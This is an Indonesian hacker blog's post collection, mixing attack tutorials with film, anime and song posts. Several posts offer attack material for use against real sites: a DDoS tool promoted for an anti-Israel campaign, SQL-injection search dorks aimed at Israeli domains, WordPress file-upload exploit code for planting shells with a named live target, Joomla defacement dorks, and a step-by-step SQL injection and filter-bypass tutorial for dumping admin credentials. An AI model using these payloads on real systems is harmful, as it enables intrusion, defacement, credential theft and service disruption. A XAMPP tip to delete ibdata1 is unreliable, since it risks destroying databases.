Tool DDOS Ampuh dengan Pwned DOS

Alhamdulilah kali ini saya Ganes a.k.a CodeX H4xor a.k.a HandsomeMan bisa share Tool buat agan agan semua hari ini :D

                                  

Berhubung 7 April ada #OPIsraelBirthday saya akan share Tool DDOS yang ampuh dengan "pwned DOS"

Penasaran pengen buruan nyoba? Cekibroottt :*

Cara Penggunaan :

pwned.py -t www.target.com -r 200 -p 80

Download Tool Pwned DOS

Read More

Dork SQL Injection Website Israel

Berhubung nanti Tanggal 7 April ada #OPIsraelBirthday ane share Dork SQLI Khusus buat Negara Israel :D

Cekibroottttttttt

Dork :

inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

intext:"error in your SQL syntax" +site:il

intext:"mysql_num_rows()" +site:il

intext:"mysql_fetch_array()" +site:il

intext:"Error Occurred While Processing Request" +site:il

intext:"Server Error in '/' Application" +site:il

intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il

intext:"Invalid Querystring" +site:il

intext:"OLE DB Provider for ODBC" +site:il

intext:"VBScript Runtime" +site:il

intext:"ADODB.Field" +site:il

intext:"BOF or EOF" +site:il

intext:"ADODB.Command" +site:il

intext:"JET Database" +site:il

intext:"mysql_fetch_row()" +site:il

intext:"Syntax error" +site:il

intext:"include()" +site:il

intext:"mysql_fetch_assoc()" +site:il

intext:"mysql_fetch_object()" +site:il

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input string was not in a correct format" +site:il


Tinggal pilih yang mana tuh bro :D

Read More

Deface Dengan Exploit Wordpress Dandelion

Alhamdulilah, kali ini saya Ganes a.k.a CodeX H4xor a.k.a Handsome Man bisa kembali memberikan tutor kepada para teman BCS :*

Yuk langsung

Dork : inurl:/wp-content/themes/dandelion/

Exploit : 


<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
File Access :

http://127.0.0.1/uploads/[years]/[month]/your_shell.php

Read More

Deface Dengan Exploit Wordpress MM Forms Community Arbitrary File Upload

Google Dork : inurl:/wp-content/plugins/mm-forms-community/

Exploit :
Klik Disini

Shell Access :

http://www.exemple.com/wordpress/wp-content/plugins/mm-forms-community/upload/temp/
Filename : $postResult output

Read More

Deface Dengan Exploit Wordpress Purevision

Dork : inurl:/wp-content/themes/purevision | USE YOUR BRAIN :*

Exploit : 

Klik Disini

Shell Acces : http://[SITE]/wp-content/themes/purevision/scripts/admin/uploadify/[shell]

Live target :

http://druzhba-glazov.ru/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php

cara kerjanya dah paham kan?

Read More

Download Film American Hustle

Sinopsis :
Sebuah film fiksi diatur dalam dunia menarik dari salah satu skandal yang paling menakjubkan untuk rock bangsa kita, Amerika Hustle menceritakan kisah brilian con man Irving Rosenfeld (Christian Bale), yang bersama dengan pasangan sama-sama licik dan menggoda British nya Sydney Prosser (Amy Adams) dipaksa bekerja untuk agen FBI liar Richie DiMaso (Bradley Cooper).

Download Film American Hustle 
Disini

Download Subtitle Indonesia
Disini











Kalau ada yang request link download Film lain, silahkan komentar aja :D

Salam Ganteng :D

Read More

Lagu Barat Yang Romantis & Slow Yang Enak Didengar

Malem ini ane lagi galau nih, jadi ane share 10 Lagu Romantis & Slow yang enak didengar menurut ane sendiri :)

1. Taylor Swift - Love Story

"Marry me Juliet you'll never have to be alone , I love you and that's all I really know , I talked to your dad go pick out a white dress , It's a love story baby just say yes"

Ini lagu menceritakan tentang Romeo dan Juliet eits tapi ceritanya beda ! Romeo dan Juliet gak meninggal , tapi menikah .. Lagu yang unik dan romantis kan ? ayo coba denger ! bener-bener romantic !


2. Kelly Clarkson - My Life Would Suck Without You

" Cause we belong together now , Forever united here somehow , You got a piece of me and honestly My Life Would Suck Without You "

Hidupku akan buruk tanpamu ? is that true ? :D

3. Avril Lavigne - I Will Be

" All my life , I'll be with you forever , To get you through the day and make everything ok"

Lagu dari penyanyi cantik Avril Lavigne ini emang romantis banyak yang udah tau ya kan ? secara gitu lagu ini romantis banget , pecinta lagu romantis pasti tau kan ? .. Berdasarkan quotes diatas artinya "Sepanjang hidupku aku akan selalu bersamamu selamanya , untuk mengisi hari-harimu dan membuat segalanya baik baik saja" SWEET !

4. Demi Lovato - My Love Is Like A Star

" My love's like a star, yeah , You can't always see me , But you know that I'm always there , When you see one shining , Take it as mine and remember I'm always near "

Lagu dari Demi Lovato ini menurutku lagu paling romantisnya Demi , berdasarkan quotes diatas artinya    

" Cintaku seperti bintang , kau tidak bisa selalu melihatku , tapi kau tau aku selalu ada , Saat kamu melihat salah satu yang bersinar , ambillah jadikan milikmu  dan ingat aku selalu didekatmu" So sweet banget sumpah !

5. MYMP - For all of my life

" For all of my life , you are the one , i will love you faithfully forever , For all of my life , you are the one , i'll give to you my greatest love "

Lagu dari MYMP ini gila so sweet banget , nih arti quotes diatas "Demi seluruh hidupku , kamu lah satu-satunya , aku akan setia mencintaimu selamanya , demi seluruh hidupku , kamu lah satu-satunya , aku akan memberikanmu cinta terbesarku" , gilee kurang So Sweet sob ?


6. One Direction - Gotta Be You

" I'll be here by your side , no more fears no more crying"

Gilee ni lagu so sweet banget {} ! berdasarkan quotes diatas artinya "Aku akan berada disini disisimu , tidak ada lagi takut , tidak ada lagi tangis " waaa so sweet ! buat cowok nih ya , yang bisa mainin gitar mainin deh lagu ini diiringi musik guitar ! pasti tuh cewek melayang :)

7. One Direction - They Don't Know About Us

"They don't know about the things we do , They Don't Know About The I Love You"

Salah satu lagu dari One Direction yang romantis abiis ! (menurutku) lagu ini menceritakan seorang cowok dan cewek pacaran tapi ada aja orang-orang yang ngejelek-jelekkin hubungan mereka . Mau itu mereka ga cocok lah , si ini gapantes si itu gapantes tapi dia bilang "Mereka gak tau apa yang kita lalui , mereka ga tau apa itu 'I Love You' " Wissss So sweet beuud !

8. Justin Bieber - Be Alright

"You know that I care for you , I'll always be there for you , Promise I will stay right here"

Cukup 2 kata SO SWEET ! lagu ini emang so sweet buat kalian yang sedang merasakan cinta dengan kekasih kalian , yang udah punya lagu ini gausah download yang belum punya yaa download :D


9. Miley Cyrus - When I Look At You

"When the waves are flooding the shore , and i can't find my way home anymore that's when i look at you !"

Cukup lebay juga yah lagu dari Miley ini . Tapi lagunya juga enak loh ! jangan salah kira , lagu ini adalah soundtrack dari Film Drama "Last Song" .. Buruan dengerin ni lagu dijamin romantis ;)

10. Justin Bieber - Nothing Like Us

"There's Nothing Like Us , There's Nothing like you and me together through the storm"

Sedih , romance ?? ah mokonya lagu dari penyanyi ganteng justin bieber ini (yang katanya buat selgom) emang top deh ! berdasarkan quotes diatas artinya "Tak ada yang seperti kita , tak ada yang seperti kamu dan aku , bersama melewati badai" so sweet :")

Read More

Download Naruto Episode 351 Subtitle Indonesia

Pada episode ini merupakan episode yang menceritakan tentang seseorang yang memiliki sel hashirama senju, dan Kakashi penasaran dengan orang tersebut, karena orang tersebut mampu mengeluarkan kekuatan Makuton (kayu) yang mana kekuatan tersebut hanya Hokage pertama Hashirama senju yang dapat mengelurakan kekuatan Makuton tersebut. Siapakah orang yang mempunyai sel Hashirama tersebut? Untuk lebih jelasnya silahkan Download video naruto shippuden episode 351 yang sudah terjemahan bahasa indonesia. Silahkan download dibawah ini.

Download Naruto  Episode 351 Subtitle Indonesia Kualitas 480p :
Disini

Download Naruto  Episode 351 Subtitle Indonesia Kualitas 750p :

Disini

Read More

Dork Com_User Terlengkap dan Terampuh

Alhamdulilah masih bisa bertemu lagi dengan saya :D
Kali ini saya Ganes a.k.a CodeX H4xor a.k.a Cowok Ganteng akan share Dork Dork Com_User Terlengkap dan Terampuh (Termasuk Dork Pri8 saya) hehe

List :

intext:"Joomla!® - бесплатное программное обеспечение, распространяемое по лицензии GNU General Public License Локализация: Портал Joomla! по-русски. Техническая поддержка: Форум русской поддержки Joomla! CMS"

Intext:"Joomla!® es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2012 - Hosting Joomla Spanish Webempresa"

intext:"Indique um nome de utilizador e senha válidos para aceder à administração do sítio.

Ver sítio."

Intext:"Bitte einen gültigen Benutzernamen und Passwort eingeben, um Zugriff zur Administration zu erhalten.

Zurück zur Website"

Intext:"Utilizza il nome utente e password validi per accedere al Pannello Amministrativo.

Torna alla Homepage del sito."

Intext:"Yönetici arayüzüne erişim için geçerli bir kullanıcı adı ve parola kullanın.

Site ana sayfasına git."

inurl:arlqueens

inurl:asturias1.7

inurl:businesslabnew

inurl:enox-tg

inurl:entreprise

inurl:everhest

inurl:garrioness

inurl:garrioness1.7

inurl:ducati

inurl:jaw009

inurl:jaw027

inurl:jubilee

inurl:larrens2

inurl:limpidium

inurl:ol_grosse

inurl:ol_horbes

inurl:platine45

inurl:profile

inurl:qualister1.5

inurl:racer_j

inurl:storyofglory  

 inurl:stylusson  

 inurl:themza_j15_81    

inurl:themza_j17_01     

inurl:themza_j17_02  

 inurl:upsilum  

inurl:vanenborg 

klo ada yang tebas, nitip "CodeX H4xor" aja yak :)
klo gk mau juga gak papa -_-

Salam ganteng :D

Read More

Mengatasi Error XAMPP

Tadi sempet jalan - jalan di web Mas Jerinx eh nemu artikel tentang Mengatasi Error XAMPP :D

Misal pas run mysql di Xamppternyata error "MYSQL shutdown unexpectedly".  Log error muncul seperti ini 

InnoDB: Error: could not open single-table tablespace file .\xat\payments.ibd
InnoDB: We do not continue the crash recovery, because the table may become
InnoDB: corrupt if we cannot apply the log records in the InnoDB log to it.
InnoDB: To fix the problem and start mysqld:
InnoDB: 1) If there is a permission problem in the file and mysqld cannot
InnoDB: open the file, you should modify the permissions.
InnoDB: 2) If the table is not needed, or you can restore it from a backup,
InnoDB: then you can remove the .ibd file, and InnoDB will do a normal
InnoDB: crash recovery and ignore that table.
InnoDB: 3) If the file system or the disk is broken, and you cannot remove
InnoDB: the .ibd file, you can set innodb_force_recovery > 0 in my.cnf
InnoDB: and force InnoDB to continue crash recovery here.

Kalo ada yang pernah mengalami seperti itu, berikut cara mengatasinya :

1. exit Xampp server
2. Masuk ke directory \xampp\mysql\data
3. hapus file ibdata1
4. restart Xampp server

Kalaupun yang belum punya Xampp, bisa Download Xampp disini 

Salam ganteng dari saya :D

Read More

Download One Piece Sub Indonesian Episode 401 - 405

Episode Sabaody Archipelago

Download One Piece Episode 401 
"Tak mungkin menghindar! Tendangan berkecepatan cahaya Admiral Kizaru!" Bahasa Indonesia

Download One Piece Episode 402

"Ada banyak sekali! Senjata penghancur angkatan laut, Pacifista!" Bahasa Indonesia

Download One Piece Episode 403 

"Musuh yang kuat muncul! Sentoumaru dengan kapak raksasa!" Bahasa Indonesia

Download One Piece Episode 404 

"Serangan dahsyat Admiral Kizaru! Topi jerami dalam Keputusasaan!" Bahasa Indonesia

Download One Piece Episode 405 

"Semua teman telah menghilang! Hari terakhir kru Bajak Laut Topi Jerami!" Bahasa Indonesia

Read More

Tutorial SQL Injection step by step

Kali ini saya akan share Tutorial SQL Injection step by step dan sekaligus menjadi post pertama di blog ini :D

SQLI Step by step

Oke langsung saja

*Mencari Web Vuln :
1. Pastikan Errornya Bukan ODBC, Page NotFound, DLL . Tetapi Errornya "Error In Your SQL Syntax"

2. Taruh Tanda " ' " Pada Bagian Belakang Website, Example : http://www.target.com/index.php?id=123'

3. Jika Mengalami Error, Maka Website Tersebut Bisa Diambil Databasenya..

4. Untuk Mencari Jumlah Kolom Terakhir Bisa Ditambahkan Dengan "ORDER BY (number)--"
-> Example : http://www.target.com/index.php?id=123 ORDER BY 1--
http://www.target.com/index.php?id=123 ORDER BY 2--
http://www.target.com/index.php?id=123 ORDER BY 3--
http://www.target.com/index.php?id=123 ORDER BY 4--
http://www.target.com/index.php?id=123 ORDER BY 5--
http://www.target.com/index.php?id=123 ORDER BY 6--
http://www.target.com/index.php?id=123 ORDER BY7--
*Jadi Hasilnya Target Hanya Memiliki 6 Kolom Saja

5. Untuk Mencari Kolom yang Bisa kita ambil datanya bisa menggunakan syntax "-(number)+UNION+SELECT+(number)--"
-> Example :http://www.target.com/index.php?id=-123+UNION+SELECT+1,2,3,4,5,6--

6. Nanti Akan Keluar Sebuah Nomor Kolom yang Bisa Kita Ambil, Kita Asumsikan Saja Kolom 3 bisa Diambil data
7. Mencari Jenis Database Bisa kita gunakan "@@version" pada Kolom yang Bisa kita ambil data
-> Example : http://www.target.com/index.php?id=-123+UNION+SELECT+1,2,@@version,4,5,6--

8. Nanti Akan Keluar Jenis Versi Database Yang Digunakan Oleh Target tersebut (Hal ini biasanya bekerja pada versi database 5.* keatas.)
9. Nah sekarang kita cari langsung, tanpa panjang lebar ini syntax langsung mencari database/tabel/column. nih syntaxnya dibawah :
(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where?(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table?_schema,0x2f,table_name,0x2f,column_name))))x)
-> Example : http://www.target.com/index.php?id=-123+SELECT+UNION+1,2,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where?(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table?_schema,0x2f,table_name,0x2f,column_name))))x),4,5,6--

10. Mengambil Informasi Database : Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh dibawah :
http://www.target.com/index.php?id=-123 UNION SELECT 1,2,group_concat(Columnname,0x3a,columnname,0x3a),4,5,6 from databasename.tablename--
*Untuk Syntax Terakhir, Code Columnname, Databasename, Tablename harus diubah data yang kita dapatkan tadi. Contoh Column admin_user, admin_password; Databasename db_target; Tablename tbl_target
-> Example :http://www.target.com/index.php?id=-123 UNION SELECT 1,2,group_concat(admin_user,0x3a,admin_pass,0x3a),4,5,6 from db_target.tbl_target--

11. Sekarang anda akan mendapatkan informasi username & database, tinggal Decrypt Password md5, Find Admin Page. Login .. Taraaaaa. Anda Sudah Menjadi Admin di Target Tersebut..

12. Cara Nebas Indexnya jangan tanya ane soalnya setiap CMS beda-beda

Sekalian ane kasih tutorial buat bypass SQL Injection
1. Saat ente ingin cari nomer togel untuk di dumped databasenya sudah anda tulis sampe 100 tetapi masih tidak error -> Example : http://www.target.com/index.php?id=123 ORDER BY 100-- (kgk mungkin tabel sampai 100 lebih) .gimana caranya biar bisa di dumped ?
2. ente kasih tanda char ' dan - . masih kgk ngerti ? nih ane kasih contohnya dibawah
-> Example : http://www.target.com/index.php?id=123' ORDER BY 100-- -
nah baru enter, dan mengalami error
misalnya ente cari et dah ternyata nomer togelnya cuman 10 (contoh)
*Note : Bypass itu digunakan sampai last step

Read More